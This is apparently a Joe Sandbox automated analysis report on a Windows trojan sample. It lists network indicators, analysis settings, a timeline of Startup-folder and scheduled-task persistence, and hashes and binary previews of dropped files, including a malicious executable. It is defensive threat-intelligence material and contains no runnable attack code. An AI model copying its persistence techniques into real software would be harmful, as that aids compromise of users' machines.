                                                                                                                                                                                                                                                            		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                                                                                                                                                                                                                                            219.73.88.167
                                                                                                                                                                                                                                                            		unknownHong Kong
                                                                                                                                                                                                                                                            		4760HKTIMS-APHKTLimitedHKfalse
                                                                                                                                                                                                                                                            212.110.188.216
                                                                                                                                                                                                                                                            		unknownUnited Kingdom
                                                                                                                                                                                                                                                            		35425BYTEMARK-ASGBtrue
                                                                                                                                                                                                                                                            103.47.93.237
                                                                                                                                                                                                                                                            		unknownIndia
                                                                                                                                                                                                                                                            		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                                                                                                                                                                                                                                            212.110.188.211
                                                                                                                                                                                                                                                            		unknownUnited Kingdom
                                                                                                                                                                                                                                                            		35425BYTEMARK-ASGBtrue
                                                                                                                                                                                                                                                            128.199.104.93
                                                                                                                                                                                                                                                            		unknownUnited Kingdom
                                                                                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                            103.47.93.236
                                                                                                                                                                                                                                                            		unknownIndia
                                                                                                                                                                                                                                                            		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                                                                                                                                                                                                                                            212.110.188.213
                                                                                                                                                                                                                                                            		unknownUnited Kingdom
                                                                                                                                                                                                                                                            		35425BYTEMARK-ASGBtrue
                                                                                                                                                                                                                                                            35.207.123.94
                                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                                            		19527GOOGLE-2USfalse
                                                                                                                                                                                                                                                            103.153.63.211
                                                                                                                                                                                                                                                            		unknownunknown
                                                                                                                                                                                                                                                            		134687TWIDC-AS-APTWIDCLimitedHKfalse
                                                                                                                                                                                                                                                            103.47.93.238
                                                                                                                                                                                                                                                            		unknownIndia
                                                                                                                                                                                                                                                            		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                                                                                                                                                                                                                                            129.18.164.130
                                                                                                                                                                                                                                                            		unknownNigeria
                                                                                                                                                                                                                                                            		36923SWIFTNG-ASNNGfalse
                                                                                                                                                                                                                                                            103.107.68.5
                                                                                                                                                                                                                                                            		unknownIndonesia
                                                                                                                                                                                                                                                            		137292ICT-AS-IDPTIntranusaCoreTeknologiIDfalse
                                                                                                                                                                                                                                                            209.240.50.56
                                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                                            		36515ASN-ALLENSUSfalse
                                                                                                                                                                                                                                                            82.137.245.41
                                                                                                                                                                                                                                                            		unknownSyrian Arab Republic
                                                                                                                                                                                                                                                            		29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                                                                                                                                                                                                                                            156.239.50.3
                                                                                                                                                                                                                                                            		unknownSeychelles
                                                                                                                                                                                                                                                            		8100ASN-QUADRANET-GLOBALUSfalse
                                                                                                                                                                                                                                                            156.239.50.5
                                                                                                                                                                                                                                                            		unknownSeychelles
                                                                                                                                                                                                                                                            		8100ASN-QUADRANET-GLOBALUSfalse
                                                                                                                                                                                                                                                            148.72.23.56
                                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                                            		26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                                                                                                                                                                            188.40.44.95
                                                                                                                                                                                                                                                            		unknownGermany
                                                                                                                                                                                                                                                            		24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                                            172.67.200.219
                                                                                                                                                                                                                                                            		sty.inkUnited States
                                                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                            188.163.170.130
                                                                                                                                                                                                                                                            		unknownUkraine
                                                                                                                                                                                                                                                            		15895KSNET-ASUAfalse
                                                                                                                                                                                                                                                            81.250.223.126
                                                                                                                                                                                                                                                            		unknownFrance
                                                                                                                                                                                                                                                            		3215FranceTelecom-OrangeFRfalse
                                                                                                                                                                                                                                                            218.252.244.126
                                                                                                                                                                                                                                                            		unknownHong Kong
                                                                                                                                                                                                                                                            		9908HKCABLE2-HK-APHKCableTVLtdHKfalse
                                                                                                                                                                                                                                                            122.3.45.189
                                                                                                                                                                                                                                                            		unknownPhilippines
                                                                                                                                                                                                                                                            		9299IPG-AS-APPhilippineLongDistanceTelephoneCompanyPHfalse
                                                                                                                                                                                                                                                            212.110.188.204
                                                                                                                                                                                                                                                            		unknownUnited Kingdom
                                                                                                                                                                                                                                                            		35425BYTEMARK-ASGBtrue
                                                                                                                                                                                                                                                            191.101.1.116
                                                                                                                                                                                                                                                            		unknownChile
                                                                                                                                                                                                                                                            		61317ASDETUKhttpwwwheficedcomGBfalse
                                                                                                                                                                                                                                                            94.131.14.66
                                                                                                                                                                                                                                                            		unknownUkraine
                                                                                                                                                                                                                                                            		29632NASSIST-ASGIfalse
                                                                                                                                                                                                                                                            212.110.188.207
                                                                                                                                                                                                                                                            		unknownUnited Kingdom
                                                                                                                                                                                                                                                            		35425BYTEMARK-ASGBtrue
                                                                                                                                                                                                                                                            103.47.93.223
                                                                                                                                                                                                                                                            		unknownIndia
                                                                                                                                                                                                                                                            		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                                                                                                                                                                                                                                            103.47.93.227
                                                                                                                                                                                                                                                            		unknownIndia
                                                                                                                                                                                                                                                            		9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                                                                                                                                                                                                                                            72.169.67.109
                                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                                            		6621HNS-DIRECPCUSfalse
                                                                                                                                                                                                                                                            104.165.127.33
                                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                                            		18779EGIHOSTINGUSfalse
                                                                                                                                                                                                                                                            104.17.9.114
                                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                            45.235.16.121
                                                                                                                                                                                                                                                            		unknownBrazil
                                                                                                                                                                                                                                                            		267406AGOBrasilInternetLtdaBRfalse
                                                                                                                                                                                                                                                            138.0.228.120
                                                                                                                                                                                                                                                            		unknownHonduras
                                                                                                                                                                                                                                                            		263725MULTICABLEDEHONDURASHNfalse
                                                                                                                                                                                                                                                            177.10.193.82
                                                                                                                                                                                                                                                            		unknownBrazil
                                                                                                                                                                                                                                                            		262854AFINETSOLUCOESEMTECNOLOGIADAINFORMACAOLTDABRfalse
                                                                                                                                                                                                                                                            213.168.250.121
                                                                                                                                                                                                                                                            		unknownEuropean Union
                                                                                                                                                                                                                                                            		63949LINODE-APLinodeLLCUSfalse
                                                                                                                                                                                                                                                            20.33.5.27
                                                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                            200.174.198.95
                                                                                                                                                                                                                                                            		unknownBrazil
                                                                                                                                                                                                                                                            		4230CLAROSABRfalse
                                                                                                                                                                                                                                                            45.71.15.136
                                                                                                                                                                                                                                                            		unknownBrazil
                                                                                                                                                                                                                                                            		267595MILANINNETBRfalse
                                                                                                                                                                                                                                                            45.224.247.102
                                                                                                                                                                                                                                                            		unknownBrazil
                                                                                                                                                                                                                                                            		266925UPIXNETWORKSBRfalse
                                                                                                                                                                                                                                                            186.211.110.178
                                                                                                                                                                                                                                                            		unknownBrazil
                                                                                                                                                                                                                                                            		53062GGNETTELECOMUNICACOESLTDABRfalse

                                                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                                            Analysis ID:1406292
                                                                                                                                                                                                                                                            Start date and time:2024-03-11 03:29:46 +01:00
                                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                            Overall analysis duration:0h 15m 46s
                                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                            Number of analysed new started processes analysed:70
                                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                                                            Sample name:dl7WL77rkA.exe
                                                                                                                                                                                                                                                            (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                                                                                                                                                                                                            Original Sample Name:39245735a6a4d2495cb6a5207bb9d5e2b6c058d113b6b0efc292330a89611757
                                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                                            Classification:mal100.troj.expl.evad.winEXE@115/137@16/100
                                                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                                                            • Successful, ratio: 87.5%
                                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                                            • Successful, ratio: 88%
                                                                                                                                                                                                                                                            • Number of executed functions: 133
                                                                                                                                                                                                                                                            • Number of non-executed functions: 200
                                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                                            • Override analysis time to 240s for rundll32

                                                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.223.198.224, 23.223.199.186, 192.229.211.108
                                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                                                                                                                                                                                            • Execution Graph export aborted for target AddInProcess32.exe, PID 44264 because it is empty
                                                                                                                                                                                                                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                            • VT rate limit hit for: dl7WL77rkA.exe

                                                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                                            03:30:35API Interceptor80x Sleep call for process: dl7WL77rkA.exe modified
                                                                                                                                                                                                                                                            03:30:51API Interceptor32x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                            03:30:52API Interceptor4810x Sleep call for process: AddInProcess32.exe modified
                                                                                                                                                                                                                                                            03:30:54AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5MU2eoXrXWjMqtCDgcUdxEXh.bat
                                                                                                                                                                                                                                                            03:30:59API Interceptor1x Sleep call for process: CGZL5y3D81OCbb2NABnHZhPM.exe modified
                                                                                                                                                                                                                                                            03:31:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat
                                                                                                                                                                                                                                                            03:31:14Task SchedulerRun new task: 88e931437f4fbe2c path: C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            03:31:14API Interceptor16775x Sleep call for process: wfplwfs.exe modified
                                                                                                                                                                                                                                                            03:31:26API Interceptor6x Sleep call for process: sUyDoVTGsfEnMY0oeyexTBut.exe modified
                                                                                                                                                                                                                                                            03:31:26API Interceptor6x Sleep call for process: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe modified
                                                                                                                                                                                                                                                            03:31:27API Interceptor6x Sleep call for process: VvPx7JMqkEvTJAQ2rPS2y2wf.exe modified
                                                                                                                                                                                                                                                            03:31:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIfCnFQFL1iakCTbZHUvqqRQ.bat
                                                                                                                                                                                                                                                            03:31:34API Interceptor6x Sleep call for process: VT4T5BrKWgz9d48cmEd8ePkZ.exe modified
                                                                                                                                                                                                                                                            03:31:43API Interceptor5x Sleep call for process: LP2uR8v5nKtflOO7HsEX74Am.exe modified
                                                                                                                                                                                                                                                            03:31:43API Interceptor6x Sleep call for process: PM6qM9TthMxsL1RAWEhuUNLx.exe modified
                                                                                                                                                                                                                                                            03:31:47API Interceptor5x Sleep call for process: YfSmDepXBWKsGmamEEWNYwB5.exe modified
                                                                                                                                                                                                                                                            03:31:47API Interceptor5x Sleep call for process: MK1r6sTJJ0KuvAGWdjimbW8H.exe modified
                                                                                                                                                                                                                                                            03:31:47API Interceptor5x Sleep call for process: pxzTG78L668f3mDyeDkHXryr.exe modified
                                                                                                                                                                                                                                                            03:31:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11FhgNaI9OC9CIBuozAEgUpl.bat
                                                                                                                                                                                                                                                            03:31:49Task SchedulerRun new task: MalayamaraUpdate path: "C:\Users\user\AppData\Local\Temp\Updater.exe"
                                                                                                                                                                                                                                                            03:31:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26fF1twXUUy7jGhqLx9vrwoW.bat
                                                                                                                                                                                                                                                            03:32:03API Interceptor5739x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                                                                            03:32:05AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5wXkSqn4DIUtGScxeGbdZDl0.bat
                                                                                                                                                                                                                                                            03:32:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6gL1gG7ldW7PoVRDY8vKo5tc.bat
                                                                                                                                                                                                                                                            03:32:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7brphmKFPcG9dvFk5ljwDtYq.bat
                                                                                                                                                                                                                                                            03:32:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lSYLKWCafZpx18kXQ49864p.bat
                                                                                                                                                                                                                                                            03:32:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asxkwIl5OZIGfxZm6YYVmkyp.bat
                                                                                                                                                                                                                                                            03:33:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bKbfQedsHp5fPnIwSbgAXTGS.bat
                                                                                                                                                                                                                                                            03:33:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C7JK1QLd1HhpC2iu6FzaXx9e.bat
                                                                                                                                                                                                                                                            03:33:30AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cgfjpHdWrKt7RBbVJLVt3KrQ.bat
                                                                                                                                                                                                                                                            03:33:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cizDnjn04HXlR48gG87ono06.bat
                                                                                                                                                                                                                                                            03:33:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cPDXi3YsHb2JKplcNt2ulL4v.bat
                                                                                                                                                                                                                                                            03:34:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CtKTLlY2LhR3aGX0PpowiHev.bat
                                                                                                                                                                                                                                                            03:34:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cXcTyLUx7TcAqwa1PaqAe42l.bat
                                                                                                                                                                                                                                                            03:34:20AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EQSWALPGSJbmdhZ5UXJP52TV.bat
                                                                                                                                                                                                                                                            03:34:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F4MKwilBLbDn1AvI4NJYim3J.bat
                                                                                                                                                                                                                                                            03:34:41AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FYS7ZbtfMHg45nrX4x6uzB9u.bat
                                                                                                                                                                                                                                                            03:34:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx6FJnbZibFTuzR4KP9Slo6z.bat
                                                                                                                                                                                                                                                            03:34:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I0bhPTX30r8P4G1lvu8sFzoW.bat
                                                                                                                                                                                                                                                            03:35:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iFau6s6nP0Npku3mzBCNvuor.bat
                                                                                                                                                                                                                                                            03:35:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kiXcuJUJS97MOwYXLopyQBva.bat

                                                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER383.tmp.dmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 16 streams, Mon Mar 11 02:34:37 2024, 0x1205a4 type
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6189520
                                                                                                                                                                                                                                                            Entropy (8bit):0.39780971882583255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:ONCQAKmAzeishDRcsgIQET4PLBDQeGss9Udu/XP:+EQLBkeGR9r/XP
                                                                                                                                                                                                                                                            MD5:F00BCE22FCB3F0A5D198325F77388393
                                                                                                                                                                                                                                                            SHA1:CC3FEE3599FF0C9130AC4BC174B7DB290FB7D935
                                                                                                                                                                                                                                                            SHA-256:01ED5F37F8571DB21CCB600742ABC34D908C19757850D2350500580532AAE8C1
                                                                                                                                                                                                                                                            SHA-512:93F8546B9D691B898E3FFCE472B52C64837010BC3DE4C27FAC387BAA090580DE8DB7EF7C6EA70617AE0AD402097F8E762C9F2E715A3CB065305B29F27790F2A0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MDMP..a..... ........m.e........................................................................................................................................................................................................................eJ..............Lw......................T.......$....l.e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):69211
                                                                                                                                                                                                                                                            Entropy (8bit):7.995787876711886
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:1536:4vHkVfDISE//aDY0WAXTF+0daIpyFQaqPZkatNjgkFOE4/JZZWnEn6:4vHKfMSeKFXdBcmnXkksE40E6
                                                                                                                                                                                                                                                            MD5:753DF6889FD7410A2E9FE333DA83A429
                                                                                                                                                                                                                                                            SHA1:3C425F16E8267186061DD48AC1C77C122962456E
                                                                                                                                                                                                                                                            SHA-256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
                                                                                                                                                                                                                                                            SHA-512:9D56F79410AD0CF852C74C3EF9454E7AE86E80BDD6FF67773994B48CCAC71142BCF5C90635DA6A056E1406E81E64674DB9584928E867C55B77B59E2851CF6444
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MSCF....[.......,...................I..................WR. .authroot.stl..L...5..CK..<Tk...p.k:.]...k..-.o.d.}.N.F....!.....$t)K."..DE.....v..gr...}?>.<.s..<...{.t..\F.e.F...8&.<..>...t8....`dqM4.y..t8..t..3..1.`\.:+.<].F...3.~.M.B...*..J....PR.+..UUUV.GY...8...._vl.....H}.s.Pq..r.<.0.lG.C..e(..oe........9..'8..m.......G8T......sR..&=.*J....s.U......#...).j...x.....gq.+.N:.Wj...V.t...(J.;^..Mr~e..}.q....q....eo..O.....@.B.S.....66.|!.(.........D!k..&.. /.....H~.....}.(..|.S..~8..A..(.#..w.*Y.....'.F...y&.8......f..49r..N...(zX.0;.....000.3c)Z.v.5N'.z...rNFw,E.NY..#ua.o.$..Y?.-.=....}d.*..]......x_<.W....ya.3.a..SQT.U..|!.pyCA..-h..Y..>n......^.U.....H...EY.\.......}.-(....h..=xiV.O.W@p.=.r.i..c...c....S.x.;..GWf...=.:.....S.c/..v..3.iG<.&..%...8..=}.....+.n\?0"A.Y%<......+..O. .9..#..>.....5.2.j.1<.Z.>v..j...wr.i.:....!...;.N[.q..z9j..l.R.&,....$.V...k.j..Tc..m..D!%....".Y.#V."w.|....L| ..p........w.=..ck...<........{s..w..};../.=...k....YH.

                                                                                                                                                                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):330
                                                                                                                                                                                                                                                            Entropy (8bit):3.1285707879821416
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:kK9dMlTN+SkQlPlEGYRMY9z+4KlDA3RUe1HEbpo:I8kPlE99SNxAhUe1HEVo
                                                                                                                                                                                                                                                            MD5:BBFEF737ABEC2F02399DF46EA4785933
                                                                                                                                                                                                                                                            SHA1:2267EA19B090F414FB56950D1B376316541C79A5
                                                                                                                                                                                                                                                            SHA-256:7806EAC284A2F2E85E17E57B9B56826359524B07AF927F49DB4E35BF2D8E1EB7
                                                                                                                                                                                                                                                            SHA-512:39C40034E2D2CCCC7F81A1586B0FAADDC5136CC7B4C8B83C4188D6D0A126A9AB0165E05DF5FC14CED3C1FB1F4F89F0491D56ACC284006F801C4BBE6826D3E252
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:p...... ........j&O._s..(....................................................... .........;.i......(...........[...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".2.c.8.3.b.1.3.b.a.f.6.9.d.a.1.:.0."...

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\1DHjR2vk6vS49GBZmU2Ta1ix.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (414)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3612
                                                                                                                                                                                                                                                            Entropy (8bit):4.599143365271236
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QiQvbGa6TDZzmQiNqcBkVEfriDe1lLfifMMT+CXDuHX3c:38bGRTihhL6HXYc
                                                                                                                                                                                                                                                            MD5:7917747B96350149925033AC9DA849A2
                                                                                                                                                                                                                                                            SHA1:B1EC9587BFC9A6F23C428243055C7C3AF360158C
                                                                                                                                                                                                                                                            SHA-256:D1C53BC1B3F14231A78C1F09D9792CCAFFC498CC841B7C6D5DDC46C04C3EECD6
                                                                                                                                                                                                                                                            SHA-512:E6C27B76BBA2BDF7D582450A2B7E0DC155318748B0F243C8DF9297E201D3DFC275726AB313F8040ECD42E09ED68E8C55932DF7B0BD9826DACD7FE50F5600A83C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr">.<head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">.. CSRF Token -->. <meta name="csrf-token" content="zK3dWOfNGw8zLX9jYxrZwz92L6uiXNEyOnJuj3Z7">.. <title>Link disabled</title>.. <meta name="robots" content="noindex">.. <link href="https://shortiny.com/uploads/brand/favicon.png" rel="icon">.. Scripts -->. <script src="https://shortiny.com/js/app.js" defer></script>.. Styles -->. <link href="https://shortiny.com/css/app.css" rel="stylesheet" data-theme-light="https://shortiny.com/css/app.css" data-theme-dark="https://shortiny.com/css/app.dark.css" data-theme-target="href">.. . <style>. @import url("https://rsms.me/inter/inter.css");. </style>. </head>. <body class="d-flex flex-column">. <div class="bg-base-1 d-flex align-items-center flex-fill">. <div class="cont

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):4283792
                                                                                                                                                                                                                                                            Entropy (8bit):7.9820526704646255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:22m9igBHAN3V/nHEqdH/DzOhde70zTyblbjrAts3HH:2LIvF/H3d7z7Y3UUtoHH
                                                                                                                                                                                                                                                            MD5:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            SHA1:BF8C0FF33582B6CD9E2BBBB243B1F4551810ED56
                                                                                                                                                                                                                                                            SHA-256:7FBC9C8489F4AC1D85322892552012650A68307902FECEC265F01F994369A35E
                                                                                                                                                                                                                                                            SHA-512:E25315483A070AD2AF3876B8818DC25F491B91617987F30C10CEBE31177CB5FB08BA6DF20B898C19F06840CB6796E5B846ECF715A13A7BA88C46EFB0A393B957
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E^.q+..q+..q+......q+......q+......q+......q+..q*..q+......q+......q+......q+.Rich.q+.........PE..L...+.Mc.....................\E...................@...................................B.....................................,.@.(....pE..w...........RA.................................................................L............................text...t........................... ..`.rdata....@.......@.................@..@.data... .....@..(....@.............@....rsrc....GL..pE..x....@.............@..@................................................................................................................................................................................................................................................................................................................................................................................

